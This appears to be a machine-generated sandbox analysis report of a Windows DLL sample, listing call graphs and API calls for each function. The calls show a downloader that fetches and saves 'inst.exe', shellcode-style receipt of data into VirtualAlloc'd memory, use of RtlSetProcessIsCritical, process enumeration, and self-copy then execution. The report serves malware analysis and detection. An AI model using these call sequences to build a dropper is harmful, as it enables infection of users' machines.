Concurrency::task_continuation_context::task_continuation_context 10366->10369 10367->10369 10374 1000eb40 10369->10374 10370 1000e47b Concurrency::task_continuation_context::task_continuation_context 10377 1000ea90 10370->10377 10373->10366 10381 1000ecb0 10374->10381 10378 1000e4ae 10377->10378 10379 1000ea9f 10377->10379 10378->10317 10380 10002620 2 API calls 10379->10380 10380->10378 10382 1000eb90 memmove 10381->10382 10383 1000eb54 10382->10383 10383->10370 11133 2870b33 11134 2870b36 11133->11134 11135 2870b87 __DllMainCRTStartup@12 2 API calls 11134->11135 11136 2870b44 __DllMainCRTStartup@12 11134->11136 11135->11136 11645 100113b5 11648 100116df 11645->11648 11649 100113c3 _except_handler4_common 11648->11649 11484 1000e739 11485 1000e74a 11484->11485 11486 10002e00 allocator 2 API calls 11485->11486 11487 1000e75d _CxxThrowException 11486->11487 10760 1000d4ba 10761 10002e00 allocator 2 API calls 10760->10761 10762 1000d4cc _CxxThrowException 10761->10762 11311 1000463a 11312 1000cde0 22 API calls 11311->11312 11313 1000464b ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z 11312->11313 11314 10002190 8 API calls 11313->11314 11315 1000466c 11314->11315 10763 1000d0bc 10764 1000d0c3 ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N 10763->10764 10765 1000be70 3 API calls 10764->10765 10766 1000d0f9 10765->10766 10845 1001153c 10846 10011545 IsProcessorFeaturePresent 10845->10846 10847 10011544 10845->10847 10849 10011587 10846->10849 10852 1001154a SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 10849->10852 10851 1001166a 10852->10851 10666 10001040 10669 10004000 10666->10669 10672 10003f30 10669->10672 10675 1000cc90 10672->10675 10676 1000cca3 10675->10676 10679 1000e370 10676->10679 10678 10001051 10682 1000cc80 10679->10682 10681 1000e38d memset 10681->10678 10682->10681 10683 10001440 10688 10001470 10683->10688 10687 10001462 10694 100013f0 10688->10694 10691 10010b1e 
10698 100113e4 10691->10698 10697 10001300 __std_exception_destroy 10694->10697 10696 100013ff 10696->10687 10696->10691 10697->10696 10699 10011691 free 10698->10699 10767 100014c0 10770 100014f0 10767->10770 10773 100012c0 __std_exception_copy 10770->10773 10772 100014d3 10773->10772 11488 28701c7 11489 2870131 11488->11489 11502 287017b 11488->11502 11490 2870144 socket 11489->11490 11491 28701cc FreeAddrInfoW 11489->11491 11492 2870186 connect 11490->11492 11493 287016d WSACleanup 11490->11493 11494 28701e0 WSACleanup 11491->11494 11498 28701f9 11491->11498 11495 28701c5 11492->11495 11496 28701aa closesocket 11492->11496 11493->11502 11494->11502 11495->11491 11496->11489 11497 2870200 recv 11497->11498 11498->11497 11499 2870282 closesocket WSACleanup 11498->11499 11500 287027e 11498->11500 11501 28702bf VirtualAlloc 11498->11501 11498->11502 11499->11498 11500->11501 11501->11502 10700 286f2c4 CloseHandle 10701 286f2f8 10700->10701 10774 100024cb 10775 100024d3 Concurrency::task_continuation_context::task_continuation_context 10774->10775 10777 100024da _Error_objects Concurrency::task_continuation_context::task_continuation_context 10775->10777 10778 10002ae0 memmove 10775->10778 10778->10777 11655 2871549 IsProcessorFeaturePresent 11656 287155e 11655->11656 11659 2871521 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 11656->11659 11658 2871641 11659->11658 11503 1000b350 ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 11504 1000b36b ?eback@?$basic_streambuf@DU?$char_traits@D@std@@@std@ ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 11503->11504 11509 1000b3ef Concurrency::task_continuation_context::task_continuation_context 11503->11509 11506 1000b383 Concurrency::task_continuation_context::task_continuation_context 11504->11506 11504->11509 11505 1000b3e2 Concurrency::task_continuation_context::task_continuation_context 11507 1000b3d0 ?_Gndec@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 11506->11507 
11508 1000b39c ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 11506->11508 11507->11505 11512 1000b3bd 11508->11512 11509->11505 11510 1000b459 ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 11509->11510 11516 10003ef0 ungetc 11509->11516 11510->11505 11511 1000b46c 11510->11511 11518 1000c0c0 ?eback@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 11511->11518 11512->11507 11512->11509 11517 10003f0d 11516->11517 11517->11505 11517->11510 11519 1000c0f8 ?setg@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXPAD00 11518->11519 11520 1000c0da ?eback@?$basic_streambuf@DU?$char_traits@D@std@@@std@ ?egptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 11518->11520 11519->11505 11520->11519 10702 10011c50 10703 10011c6c 10702->10703 10704 10011c5c ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE 10702->10704 10704->10703 11137 2861b57 11140 2861b87 11137->11140 11156 2871737 11140->11156 11143 2861bd5 HttpQueryInfoW 11144 2861c11 SendMessageW 11143->11144 11145 2861c28 InternetReadFile 11143->11145 11144->11145 11146 2861cfe InternetCloseHandle InternetCloseHandle GetParent ShowWindow 11145->11146 11149 2861c4a 11145->11149 11158 2861727 11146->11158 11149->11145 11149->11146 11152 2861ce8 SendMessageW 11149->11152 11150 2861d42 11151 2861727 6 API calls 11150->11151 11153 2861d52 11151->11153 11152->11149 11164 286f307 11153->11164 11157 2861b94 InternetOpenA InternetOpenUrlA 11156->11157 11157->11143 11159 2861749 11158->11159 11163 2861780 _Error_objects 11158->11163 11183 2870748 RtlAcquireSRWLockExclusive 11159->11183 11161 2861753 _Error_objects 11161->11163 11188 28706f7 RtlAcquireSRWLockExclusive RtlReleaseSRWLockExclusive RtlWakeAllConditionVariable 11161->11188 11163->11150 11165 286f329 11164->11165 11190 286ee57 RpcStringBindingComposeW 11165->11190 11171 286f388 _swprintf 11205 286ff17 NdrClientCall2 11171->11205 11173 2861b7a 11174 286f405 Sleep 11175 286f057 5 API calls 11174->11175 11176 286f3e1 11175->11176 11176->11173 11176->11174 11177 
286f42e 11176->11177 11206 286f1e7 11177->11206 11179 286f456 Sleep 11180 286f43b 11179->11180 11180->11173 11180->11179 11181 286f49b 11180->11181 11182 286f217 NdrClientCall2 11181->11182 11182->11173 11184 287075c 11183->11184 11185 2870761 RtlReleaseSRWLockExclusive 11184->11185 11189 2870797 SleepConditionVariableSRW 11184->11189 11185->11161 11188->11163 11189->11184 11191 286eea4 11190->11191 11192 286eea8 RpcBindingFromStringBindingW RpcBindingSetAuthInfoExA RpcStringFreeW 11190->11192 11193 286f057 11191->11193 11192->11191 11196 286f080 11193->11196 11194 286f0ba 11194->11171 11202 286f217 11194->11202 11196->11194 11197 286f1a5 CoTaskMemFree 11196->11197 11198 286f1b8 CoTaskMemFree 11196->11198 11199 286f148 11196->11199 11209 286ff47 NdrClientCall2 11196->11209 11197->11196 11198->11194 11198->11196 11200 286f175 CoTaskMemFree 11199->11200 11201 286f162 CoTaskMemFree 11199->11201 11200->11194 11201->11199 11210 286ffc7 NdrClientCall2 11202->11210 11204 286f229 11204->11171 11205->11176 11211 286ff87 NdrClientCall2 11206->11211 11208 286f208 11208->11180 11209->11196 11210->11204 11211->11208 11521 10010b5d 11522 10010b68 11521->11522 11523 10010b9b 11521->11523 11526 10010b6d 11522->11526 11527 10010bb0 11522->11527 11524 10010cb7 __DllMainCRTStartup@12 15 API calls 11523->11524 11524->11526 11528 10010bbc ___scrt_is_nonwritable_in_current_image 11527->11528 11545 10010942 11528->11545 11530 10010bc3 __DllMainCRTStartup@12 11531 10010bea 11530->11531 11532 10010caf 11530->11532 11539 10010c4a ___scrt_is_nonwritable_in_current_image 11530->11539 11549 100108a4 11531->11549 11533 1001124d __DllMainCRTStartup@12 6 API calls 11532->11533 11535 10010cb6 11533->11535 11536 10010bf9 __RTC_Initialize 11536->11539 11552 100114a3 InitializeSListHead 11536->11552 11538 10010c07 11540 10010c0c _initterm_e 11538->11540 11539->11526 11540->11539 11541 10010c21 11540->11541 11553 10010879 11541->11553 11543 10010c26 11543->11539 11544 10010c2a _initterm 11543->11544 
11544->11539 11546 1001094b 11545->11546 11562 10010f10 IsProcessorFeaturePresent 11546->11562 11548 10010957 ___scrt_uninitialize_crt 11548->11530 11564 1001097b 11549->11564 11551 100108ab 11551->11536 11552->11538 11554 1001087e ___scrt_release_startup_lock 11553->11554 11555 10010882 11554->11555 11556 10010889 11554->11556 11557 10010f10 IsProcessorFeaturePresent 11555->11557 11559 1001088e _configure_narrow_argv 11556->11559 11558 10010887 11557->11558 11558->11543 11560 10010899 11559->11560 11561 1001089c _initialize_narrow_environment 11559->11561 11560->11543 11561->11558 11563 10010f34 11562->11563 11563->11548 11565 10010987 11564->11565 11566 1001098b 11564->11566 11565->11551 11567 100109fa 11566->11567 11570 10010998 ___scrt_release_startup_lock 11566->11570 11568 1001124d __DllMainCRTStartup@12 6 API calls 11567->11568 11569 10010a01 11568->11569 11571 100109a5 _initialize_onexit_table 11570->11571 11572 100109c3 11570->11572 11571->11572 11573 100109b4 _initialize_onexit_table 11571->11573 11572->11551 11573->11572 10779 100108de 10781 100108e6 ___scrt_release_startup_lock 10779->10781 10780 10010903 _seh_filter_dll 10781->10780 9166 10001a60 9167 10001a81 GetModuleHandleA CreateWindowExW SetWindowTheme SendMessageW malloc 9166->9167 9168 10001a72 9166->9168 9176 10001f50 9167->9176 9169 10001b52 PostQuitMessage 9168->9169 9170 10001a7c DefWindowProcW 9168->9170 9173 10001b75 9169->9173 9170->9173 9175 10001b32 CreateThread 9175->9173 9178 10001b80 9175->9178 9177 10001f5f Concurrency::task_continuation_context::task_continuation_context 9176->9177 9177->9175 9181 10001bb0 9178->9181 9180 10001ba3 9196 10011760 9181->9196 9184 10001c51 InternetReadFile 9186 10001d27 fclose InternetCloseHandle InternetCloseHandle GetParent ShowWindow 9184->9186 9189 10001c73 9184->9189 9185 10001c3a SendMessageW 9185->9184 9198 10001750 9186->9198 9187 10001c7d fwrite 9187->9189 9189->9184 9189->9186 9189->9187 9192 10001d11 SendMessageW 9189->9192 9190 10001d6b 
9191 10001750 17 API calls 9190->9191 9193 10001d7b 9191->9193 9192->9189 9212 1000f330 9193->9212 9197 10001bbd InternetOpenA InternetOpenUrlA fopen HttpQueryInfoW 9196->9197 9197->9184 9197->9185 9199 10001772 9198->9199 9201 100017a9 _Error_objects 9198->9201 9251 10010771 AcquireSRWLockExclusive 9199->9251 9240 10002e30 9201->9240 9202 1000177c _Error_objects 9202->9201 9256 10010b09 9202->9256 9207 100017f9 9244 10001de0 9207->9244 9209 1000180a 9248 10001dc0 9209->9248 9211 10001812 9211->9190 9213 1000f352 9212->9213 9330 1000f590 9213->9330 9220 1000f3b1 9345 1000ef30 9220->9345 9221 1000f240 NdrClientCall2 9221->9220 9227 1000f40a 9228 1000f42e Sleep 9227->9228 9229 10001d8e exit 9227->9229 9231 1000f457 9227->9231 9230 1000f080 5 API calls 9228->9230 9229->9180 9230->9227 9364 1000f210 9231->9364 9233 1000f47f Sleep 9367 1000f5b0 9233->9367 9236 10001dc0 2 API calls 9237 1000f464 9236->9237 9237->9229 9237->9233 9237->9236 9238 1000f4c4 9237->9238 9371 1000f260 CreateToolhelp32Snapshot 9237->9371 9382 1000f240 9238->9382 9241 10002e65 HandleT 9240->9241 9243 10002ea2 _Error_objects 9241->9243 9260 100038b0 9241->9260 9243->9207 9245 10001df2 HandleT Concurrency::task_continuation_context::task_continuation_context 9244->9245 9246 100023a0 2 API calls 9245->9246 9247 10001dfa 9245->9247 9246->9247 9247->9209 9249 100023a0 2 API calls 9248->9249 9250 10001dcf 9249->9250 9250->9211 9255 10010785 9251->9255 9252 1001078a ReleaseSRWLockExclusive 9252->9202 9255->9252 9325 100107c0 SleepConditionVariableSRW 9255->9325 9326 10010adb 9256->9326 9259 10010720 AcquireSRWLockExclusive ReleaseSRWLockExclusive WakeAllConditionVariable 9259->9201 9261 100038dc Concurrency::task_continuation_context::task_continuation_context 9260->9261 9263 1000391c 9261->9263 9268 100015e0 ?_Xlength_error@std@@YAXPBD 9261->9268 9265 1000393f Concurrency::task_continuation_context::task_continuation_context 9263->9265 9269 100039e0 9263->9269 9272 10003b00 9265->9272 9268->9263 9276 
10003b90 9269->9276 9273 100039c1 9272->9273 9274 10003b0f 9272->9274 9273->9243 9309 100023a0 9274->9309 9279 10003bd0 9276->9279 9284 10003c70 9279->9284 9285 10003be0 9284->9285 9286 10003c8a 9284->9286 9288 10003c30 9285->9288 9295 10001490 9286->9295 9289 10003c3d 9288->9289 9290 10003a05 9288->9290 9291 10003c54 9289->9291 9292 10003c46 9289->9292 9290->9265 9306 10001520 9291->9306 9298 10003cb0 9292->9298 9296 10001410 stdext::threads::lock_error::lock_error 9295->9296 9297 1000149e _CxxThrowException 9296->9297 9297->9285 9299 10003cc7 9298->9299 9302 10003ccc 9298->9302 9300 10001490 allocator _CxxThrowException 9299->9300 9300->9302 9301 10001520 allocator _callnewh malloc _CxxThrowException _CxxThrowException 9303 10003cd6 9301->9303 9302->9301 9304 10003ce4 _invalid_parameter_noinfo_noreturn 9303->9304 9305 10003cf3 9303->9305 9304->9303 9304->9304 9305->9290 9307 100107d5 allocator _callnewh malloc _CxxThrowException _CxxThrowException 9306->9307 9308 1000152c 9307->9308 9308->9290 9310 100023b7 Concurrency::task_continuation_context::task_continuation_context 9309->9310 9312 100023e8 _Error_objects 9310->9312 9313 10002b30 9310->9313 9312->9273 9316 10002dc0 9313->9316 9319 10003550 9316->9319 9320 1000357e 9319->9320 9321 10003571 9319->9321 9323 10010b1e _MallocaArrayHolder free 9320->9323 9322 10001540 allocator _invalid_parameter_noinfo_noreturn 9321->9322 9322->9320 9324 10002b5b 9323->9324 9324->9312 9325->9255 9327 10010af1 _register_onexit_function 9326->9327 9328 10010aea _crt_atexit 9326->9328 9329 1000179c 9327->9329 9328->9329 9329->9259 9385 1000f8a0 9330->9385 9333 1000ee80 RpcStringBindingComposeW 9334 1000eed1 RpcBindingFromStringBindingW RpcBindingSetAuthInfoExA RpcStringFreeW 9333->9334 9335 1000eecd 9333->9335 9334->9335 9336 1000f080 9335->9336 9339 1000f0a9 9336->9339 9337 1000f0e3 9337->9220 9337->9221 9339->9337 9340 1000f1e1 CoTaskMemFree 9339->9340 9341 1000f1ce CoTaskMemFree 9339->9341 9342 1000f171 9339->9342 9411 1000ff70 
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetNativeSystemInfo.KERNEL32(?), ref: 028604AE
                                                                                                                                                                      • VirtualAlloc.KERNEL32(?,?,00003000,00000004), ref: 028604DE
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1778533321.0000000002860000.00000040.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_2860000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocInfoNativeSystemVirtual
                                                                                                                                                                      • String ID: A$A$Cach$F$Fu$G$Li$Lo$P$Rt$S$Syst$Ta$Vi$Via$a$a$a$a$b$b$ctio$ee$fo$iv$mI$o$oc$otec$p$st$t$tNat$tu$tu$ucti$ushI$yA
                                                                                                                                                                      • API String ID: 2032221330-2899676511
                                                                                                                                                                      • Opcode ID: 82ef88a58992c726dca534e4f3eff6f5ce2a19202078a525a2214f4ed1b422dd
                                                                                                                                                                      • Instruction ID: 20b1533ca945967a01a7202aa5fb22a40f2745df98c920629b603b0611bc0325
                                                                                                                                                                      • Opcode Fuzzy Hash: 82ef88a58992c726dca534e4f3eff6f5ce2a19202078a525a2214f4ed1b422dd
                                                                                                                                                                      • Instruction Fuzzy Hash: D1628A395083858FD720CF24C844BABBBE5FF94704F04492DE9C9DB292E7719948CB9A

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • InternetOpenA.WININET(URLDownloader,00000001,00000000,00000000,00000000), ref: 10001BCA
                                                                                                                                                                      • InternetOpenUrlA.WININET(?,?,00000000,00000000,80000000,00000000), ref: 10001BE6
                                                                                                                                                                      • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,10012458,?,10001BA3,?,?,?), ref: 10001BF8
                                                                                                                                                                      • HttpQueryInfoW.WININET(?,20000005,00000000,00000004,00000000), ref: 10001C2D
                                                                                                                                                                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 10001C4A
                                                                                                                                                                      • InternetReadFile.WININET(?,?,00001000,?), ref: 10001C65
                                                                                                                                                                      • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 10001C8E
                                                                                                                                                                      • SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 10001D1B
                                                                                                                                                                      • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 10001D2B
                                                                                                                                                                      • InternetCloseHandle.WININET(?), ref: 10001D38
                                                                                                                                                                      • InternetCloseHandle.WININET(?), ref: 10001D42
                                                                                                                                                                      • GetParent.USER32(?), ref: 10001D4C
                                                                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 10001D5B
                                                                                                                                                                      • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 10001D93
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1781648815.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.1781607446.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781724637.0000000010012000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781825804.0000000010017000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781861555.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_10000000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Internet$CloseHandleMessageOpenSend$FileHttpInfoParentQueryReadShowWindowexitfclosefopenfwrite
                                                                                                                                                                      • String ID: URLDownloader$inst.exe
                                                                                                                                                                      • API String ID: 3413257080-3182466430
                                                                                                                                                                      • Opcode ID: 8167bd165008061e034a8e8451ddf05a0f2f7158e41ec6c26d4c78a1f0855317
                                                                                                                                                                      • Instruction ID: ddbd601f5f187a188268b5c7d9f2a971705c802d5f1a5a55912b1b5dcc305942
                                                                                                                                                                      • Opcode Fuzzy Hash: 8167bd165008061e034a8e8451ddf05a0f2f7158e41ec6c26d4c78a1f0855317
                                                                                                                                                                      • Instruction Fuzzy Hash: 2A5109B5D40219ABEB04DFA4CC85FEEB775FF48741F108209F605BA290D774AA90CB61

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 1000F26D
                                                                                                                                                                      • Process32FirstW.KERNEL32(000000FF,0000022C), ref: 1000F298
                                                                                                                                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP140(1000D110), ref: 1000F2C1
                                                                                                                                                                      • CloseHandle.KERNEL32(000000FF), ref: 1000F2CB
                                                                                                                                                                      Strings
                                                                                                                                                                      • Failed to retrieve first process., xrefs: 1000F2A2
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1781648815.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.1781607446.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781724637.0000000010012000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781825804.0000000010017000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781861555.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_10000000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: V01@$??6?$basic_ostream@CloseCreateD@std@@@std@@FirstHandleProcess32SnapshotToolhelp32U?$char_traits@V01@@
                                                                                                                                                                      • String ID: Failed to retrieve first process.
                                                                                                                                                                      • API String ID: 592929778-1967016982
                                                                                                                                                                      • Opcode ID: 98de57343e861626075a39aa984df5a9d5828a3fa4c83e5535eac612fe9e42d8
                                                                                                                                                                      • Instruction ID: 0ce586cc59c24ae6f6b9b608917b68c1bdf63cf15262094913b6f28177916ec4
                                                                                                                                                                      • Opcode Fuzzy Hash: 98de57343e861626075a39aa984df5a9d5828a3fa4c83e5535eac612fe9e42d8
                                                                                                                                                                      • Instruction Fuzzy Hash: 0D1196B4900218FFEB10EFB0CD89AAE77B8EF08391F104699E90597155D734EB54EB50

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • RpcStringBindingComposeW.RPCRT4(00000000,100124B8,localhost,100124CC,00000000,10001D8E), ref: 1000EEBE
                                                                                                                                                                      • RpcBindingFromStringBindingW.RPCRT4(10001D8E,00000000), ref: 1000EED9
                                                                                                                                                                      • RpcBindingSetAuthInfoExA.RPCRT4(00000000,00000000,00000006,0000000A,00000000,00000000,00000001), ref: 1000EF10
                                                                                                                                                                      • RpcStringFreeW.RPCRT4(10001D8E), ref: 1000EF1A
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1781648815.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.1781607446.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781724637.0000000010012000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781825804.0000000010017000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781861555.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_10000000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Binding$String$AuthComposeFreeFromInfo
                                                                                                                                                                      • String ID: localhost
                                                                                                                                                                      • API String ID: 1126441048-2663516195
                                                                                                                                                                      • Opcode ID: c91bc88c3a7059766f5b07bc0c43bf0a72e79487a92db334c44e55e67c91127a
                                                                                                                                                                      • Instruction ID: cda66700fc1d67de1566ef6c2ee8939abb6b7c8c1a3f56331cb5e05d924021ce
                                                                                                                                                                      • Opcode Fuzzy Hash: c91bc88c3a7059766f5b07bc0c43bf0a72e79487a92db334c44e55e67c91127a
                                                                                                                                                                      • Instruction Fuzzy Hash: B611D7B4D00209BFEB14CFE4C985BEEBBB4FB08704F108159E605BB280D7B59A54CBA0

                                                                                                                                                                      APIs
                                                                                                                                                                      • InitCommonControlsEx.COMCTL32(00000008), ref: 10001A93
                                                                                                                                                                      • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 10001A9D
                                                                                                                                                                      • CreateWindowExW.USER32(00000000,msctls_progress32,00000000,50800001,00000014,0000001E,00000159,00000014,00000001,00000065,00000000), ref: 10001AC3
                                                                                                                                                                      • SetWindowTheme.UXTHEME(00020456,10012444,10012440), ref: 10001ADE
                                                                                                                                                                      • SendMessageW.USER32(00020456,00000409,00000000,00D77800), ref: 10001AF7
                                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(0000000C), ref: 10001B08
                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_00001B80,?,00000000,00000000), ref: 10001B49
                                                                                                                                                                      • PostQuitMessage.USER32(00000000), ref: 10001B54
                                                                                                                                                                      • DefWindowProcW.USER32(00000002,?,?,?), ref: 10001B6D
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1781648815.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.1781607446.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781724637.0000000010012000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781825804.0000000010017000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000001.00000002.1781861555.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$CreateMessage$CommonControlsHandleInitModulePostProcQuitSendThemeThreadmalloc
                                                                                                                                                                      • String ID: $msctls_progress32$3Ro

                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleHandleA.KERNEL32(00000000), ref: 10001852
                                                                                                                                                                        • Part of subcall function 10001600: SHGetKnownFolderPath.SHELL32(10012340,00000000,00000000,00000000), ref: 1000165B
                                                                                                                                                                        • Part of subcall function 10001600: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,00000104), ref: 1000167A
                                                                                                                                                                        • Part of subcall function 10001600: CoTaskMemFree.OLE32(00000000,00000000,?), ref: 100016AE
                                                                                                                                                                      • RegisterClassW.USER32(?), ref: 100019AD
                                                                                                                                                                      • CreateWindowExW.USER32(00000000,?,00000000,00000000,?,?,?,?,?,?,10011876), ref: 100019E8
                                                                                                                                                                      • ShowWindow.USER32(?,00000001,?,?,?,?,?,?,10011876), ref: 100019F7
                                                                                                                                                                      • KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 10001A1E
                                                                                                                                                                      • TranslateMessage.USER32(?), ref: 10001A2C
                                                                                                                                                                      • DispatchMessageW.USER32(?), ref: 10001A36
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1781648815.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessageWindow$CallbackClassCreateDispatchDispatcherFolderFreeHandleKnownModulePathRegisterShowTaskTranslateUserwcstombs
                                                                                                                                                                      • String ID: URLDownloader$inst.exe

                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCurrentThread.KERNEL32 ref: 1001061D
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(00000000), ref: 10010624
                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,100048C0,00000000,00000000,00000000), ref: 10010639
                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,100100C0,00000000,00000000,00000000), ref: 1001064E
                                                                                                                                                                        • Part of subcall function 10001170: LoadLibraryW.KERNEL32(ntdll.dll), ref: 1000117B
                                                                                                                                                                        • Part of subcall function 10001170: GetProcAddress.KERNEL32(?,RtlAdjustPrivilege), ref: 1000118D
                                                                                                                                                                        • Part of subcall function 10001170: GetProcAddress.KERNEL32(?,RtlSetProcessIsCritical), ref: 100011A1
                                                                                                                                                                        • Part of subcall function 10001170: GetModuleHandleA.KERNEL32(00000000), ref: 100011FD
                                                                                                                                                                        • Part of subcall function 10001170: RegisterClassW.USER32(?), ref: 10001211
                                                                                                                                                                        • Part of subcall function 10001170: CreateWindowExW.USER32(00000000,ndowClass,indow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 10001236
                                                                                                                                                                      • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 1001065B
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1781648815.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateThread$AddressProc$ClassCurrentHandleLibraryLoadModuleObjectRegisterSingleWaitWindowexit
                                                                                                                                                                      • String ID:

                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 1000EE80: RpcStringBindingComposeW.RPCRT4(00000000,100124B8,localhost,100124CC,00000000,10001D8E), ref: 1000EEBE
                                                                                                                                                                      • _swprintf.LIBCMTD ref: 1000F3DC
                                                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 1000F433
                                                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 1000F484
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1781648815.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Sleep$BindingComposeString_swprintf
                                                                                                                                                                      • String ID: 5555555555

                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 10010380: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 100103B3
                                                                                                                                                                        • Part of subcall function 10010330: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1001034E
                                                                                                                                                                      • CopyFileA.KERNEL32(00000000,?,00000000), ref: 100105A6
                                                                                                                                                                      • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 100105CC
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
